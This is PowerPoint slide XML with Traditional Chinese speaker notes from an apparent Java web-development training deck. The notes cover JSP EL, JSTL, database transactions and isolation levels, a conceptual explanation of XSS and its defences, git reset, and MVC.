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302" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="278" r:id="rId5"/>
    <p:sldId id="279" r:id="rId6"/>
    <p:sldId id="280" r:id="rId7"/>
    <p:sldId id="282" r:id="rId8"/>
    <p:sldId id="283" r:id="rId9"/>
    <p:sldId id="281" r:id="rId10"/>
    <p:sldId id="293" r:id="rId11"/>
    <p:sldId id="284" r:id="rId12"/>
    <p:sldId id="286" r:id="rId13"/>
    <p:sldId id="287" r:id="rId14"/>
    <p:sldId id="288" r:id="rId15"/>
    <p:sldId id="258" r:id="rId16"/>
    <p:sldId id="259" r:id="rId17"/>
    <p:sldId id="260" r:id="rId18"/>
    <p:sldId id="262" r:id="rId19"/>
    <p:sldId id="261" r:id="rId20"/>
    <p:sldId id="268" r:id="rId21"/>
    <p:sldId id="263" r:id="rId22"/>
    <p:sldId id="270" r:id="rId23"/>
    <p:sldId id="269" r:id="rId24"/>
    <p:sldId id="264" r:id="rId25"/>
    <p:sldId id="265" r:id="rId26"/>
    <p:sldId id="266" r:id="rId27"/>
    <p:sldId id="267" r:id="rId28"/>
    <p:sldId id="271" r:id="rId29"/>
    <p:sldId id="272" r:id="rId30"/>
    <p:sldId id="273" r:id="rId31"/>
    <p:sldId id="274" r:id="rId32"/>
    <p:sldId id="275" r:id="rId33"/>
    <p:sldId id="291" r:id="rId34"/>
    <p:sldId id="290" r:id="rId35"/>
    <p:sldId id="292" r:id="rId36"/>
    <p:sldId id="294" r:id="rId37"/>
    <p:sldId id="296" r:id="rId38"/>
    <p:sldId id="298" r:id="rId39"/>
    <p:sldId id="299" r:id="rId40"/>
    <p:sldId id="300" r:id="rId41"/>
    <p:sldId id="305" r:id="rId42"/>
    <p:sldId id="303" r:id="rId43"/>
    <p:sldId id="307" r:id="rId44"/>
    <p:sldId id="308" r:id="rId45"/>
    <p:sldId id="310" r:id="rId46"/>
    <p:sldId id="315" r:id="rId47"/>
    <p:sldId id="309" r:id="rId48"/>
    <p:sldId id="319" r:id="rId49"/>
    <p:sldId id="318" r:id="rId50"/>
    <p:sldId id="320" r:id="rId51"/>
    <p:sldId id="314" r:id="rId52"/>
    <p:sldId id="311" r:id="rId53"/>
    <p:sldId id="313" r:id="rId54"/>
    <p:sldId id="312" r:id="rId55"/>
    <p:sldId id="316" r:id="rId56"/>
    <p:sldId id="304" r:id="rId57"/>
    <p:sldId id="306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D7"/>
    <a:srgbClr val="D13B3B"/>
    <a:srgbClr val="F8D0D0"/>
    <a:srgbClr val="492207"/>
    <a:srgbClr val="1A7C34"/>
    <a:srgbClr val="B5EDB6"/>
    <a:srgbClr val="8BFF96"/>
    <a:srgbClr val="9BF16B"/>
    <a:srgbClr val="115322"/>
    <a:srgbClr val="D15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2" autoAdjust="0"/>
    <p:restoredTop sz="87581" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="72" d="100"/>
          <a:sy n="72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C1DE-A6DA-4017-9553-3C39AEEBAE8E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4A15D-43C4-42BC-8F47-5807BA1798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2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從他的名稱就可以知道他跟前端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>有關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2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Language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方便讀取資料的一種語法，取得後端、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等資料，可判斷、運算，不可修改值、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可配合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JSTL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8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JSTL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>從字面上來看就是一個充滿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，他的功能是包裝常用方法，達到程式碼複用，不用每次都重新寫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>scriptlet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，同時也因為表達比較精簡，可以讓程式碼更加美觀，例如如果使用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原本的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>scriptlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，來做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判斷，頁面就會變得非常複雜與醜陋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5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0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Try ‘finally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return’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>??</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Megutil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&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>log.err</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>參數差異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常見</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Overcountexcepiton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dbexception</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Modelexp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>. -&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Rootexception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4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checkCompanyPackage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howto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def.??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-&gt;323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一旦使用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如果沒有執行  </a:t>
            </a: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則會進行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因此三個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>function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缺一不可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交易控制的優點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確保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commit/rollback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減少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跨子系統時可能會有權限問題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找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>searchedCaller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com.cathaybk.xx.dao.XX_CARS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去除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>com.cathaybk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得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>callerSubStr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xx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，改為大寫後與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>inpudStartsWithStr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(DS_)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>相加回傳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62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上述交易控制可以用來維持交易四大原則</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>原子性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資料庫單元操作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沒有全部執行，就都不能執行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一致性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: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假設「張三」客戶欲從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轉入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元到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，交易前「張三」在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元，在交易完成後，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US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A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和</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US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銀行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的總和必須還是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US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15,000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元，因此，在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" alt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前</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" sz="1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的帳戶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總額是相同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的。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隔離性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kumimoji="0" lang="zh-TW" altLang="en-US" sz="1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一個交易</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" sz="1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不會影響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到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其它交易的執行結果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，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" sz="1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或被其它交易所干擾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。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60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各自連線存取資料庫</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可能不滿足原子性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8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共用連線</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>共用連線進行資料庫存取</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>確保</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>commit/rollback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>正常運作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325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dirty="0" err="1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Ora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. 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支援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2.4.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，隔離等級都是在讀取時設定，新增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.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異動時都是採用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serializable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等級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除了使用交易控制來管理交易</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>也可以透過資料表的鎖定來維持四大原則，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DB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>需要有隔離層級，不同狀況採用不同的隔離層級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0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9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第一個交易修改資料，而第二個交易在第一個交易「確認前」讀取修改的資料。如果第一個交易中途發生故障，必須撤回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回復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的情況。第二個交易將取得不正確的資料。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47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2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在查詢時，而交易</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW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1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="320E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卻還可以進行更新新增與刪除的問題，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無法重覆讀取到相同結果</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="320E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55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Serializable-&gt;Lock table,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repeatable-&gt;lock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兩次取得的筆數不相同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04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https://hackertarget.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/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就是惡意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的程式碼在網站讀取時執行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，通常透過一些前端語言例如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來反映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例如有人在這個網頁放入惡意的程式碼，當使用者瀏覽這個網頁的時候就會啟動這個惡意程式嗎，這時候使用者的一些機密資料可能就會被竊取、傳回給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86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Reflection:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>網站會反映出輸入的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attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>發現更改帳密的時候透過</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>變數來傳遞資料，這時候他就可以直接在變數上面放入惡意程式碼，然後透過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方式打包，再接結果寄給使用者，使用者若點選這個網址就會執行攻擊者放入的功能</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Dom:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 惡意程式碼的輸出位置在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>dom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>端，例如這個網址會將頁面導到一個利用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取值得網頁，且這個網頁會把取到的值直接當成網頁內容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取值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並把他們當成網頁中的內容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1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造成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的攻擊主要在於具有特殊涵義的符號字元被當成指令來使用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80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再來介紹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的一些防禦方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以透過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的設定，例如這個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ajaxfilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，他可以指定什麼時候要進行過濾。當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傳入之後，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可以進行過濾的功能，就像一層濾紙</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>裡面去做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>doFilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，當我故意在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欄輸入一個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，就會啟動她，最後會跳出這個小視窗</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>儲存參數使用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fn:escapeXml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49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是一套功能強大的分散式版本控管系統，介紹他的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復原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是一套分散式版本控管系統，例如支援本地操作、備份容易、功能強大且彈性的分支與合併等等。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92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由這三個區塊所組成，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管理的資料夾、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>站存處、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檔案庫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綠色代表目前狀態</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>HEAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>為相對名稱，最新的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點永遠為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，絕對名稱為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>SHA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>雜湊運算出來的亂碼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878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r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>之後會不斷創造節點，那如何回到之前節點的狀態</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>?----&gt;reset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reset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>就只是把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>HEAD(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>最新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移動到指定結點上，各參數之間的差異就只是在資料恢復的範圍，決定是否把原來 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>working tree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中的資料內容一起 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>reset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>成指定結點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62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MVC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>這種架構，也就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>model…</a:t>
            </a:r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負責的工作為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>m.v.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>就像三顆緊密相依的螺絲一樣個體間彼此是獨立的，擁有自己的齒輪大小，但是又必須互相配合才能讓機器，也就是我們的網站運轉</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>而使用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的好處就是我們可以讓專精於不統領域的人一起工作，例如有人前端比較強就負責打造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這顆齒輪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154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假如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完成了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的功能，接下來開始做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功能，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>head~1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>只是微小更新，最後做出了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 smtClean="0"/>
              <a:t>現在想剃除微小更動的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，可使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>reset –soft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移到原本的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>head~2</a:t>
            </a:r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會回復到原本的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>head~2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的檔案狀態，但快取跟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>working</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
              <a:t> directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>卻不會變動，也就是維持在為成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
              <a:t>insert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>功能的狀態</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>這時候就可以重新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，得到一個比較乾淨的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1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add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的時候可能加錯檔案，就可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>reset—mix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，他就是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的預設方法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中的檔案回到目標節點狀態</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>這時候就可以重新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>add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–cached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從快取移除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一定要確保之前有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節點，使用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要確定有加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>cached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中也會移除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11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功能，但是後來的兩個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卻亂七八糟，想要放棄目前本地的所有變更時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就可以執行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-hard HEAD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來強制恢復所有資料內容及狀態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92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執行一些指令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reset)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可能會在演進圖上找不到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的版本節點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reflog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>找到特殊參考名稱來</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>reset –hard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>即可復原到原本找不到的節點位置了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0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導特定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001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70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checkCompanyPackage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howto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def.??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-&gt;323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一旦使用</a:t>
            </a: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如果沒有執行  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Transaction.commit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則會進行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rollback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 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因此三個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>缺一不可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交易控制的優點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確保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commit/rollback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減少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跨子系統時可能會有權限問題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找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>searchedCaller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com.cathaybk.xx.dao.XX_CARS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去除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>com.cathaybk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>callerSubStr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，找出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>xx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，改為大寫後與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>inpudStartsWithStr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(DS_)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>相加回傳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6118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Transaction.begin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直接取得連線名稱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無交易控制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中才取得連線名稱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45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checkCompanyPage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如何定義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依序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>判斷是否為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>com.cathay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -&gt;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com.cathayins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -&gt;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如果不是以上兩者，則使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>pror_checkCompanyPackages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>來儲存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>CUB.properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>裡面的東西，接下來在依依判斷</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>searchedCaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>的起始是否為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
              <a:t>CUB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>裡的東西。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如果前三個步驟有個步驟成立則切割後丟進</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>callerSubStr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>若上述三者都不符合，則印出文字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
              <a:t>class package location error…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>最後利用貿號來切割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所以如果外人要來使用，需要在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>CUB.properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>裡加上他需要的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Company package</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" baseline="0" dirty="0" smtClean="0"/>
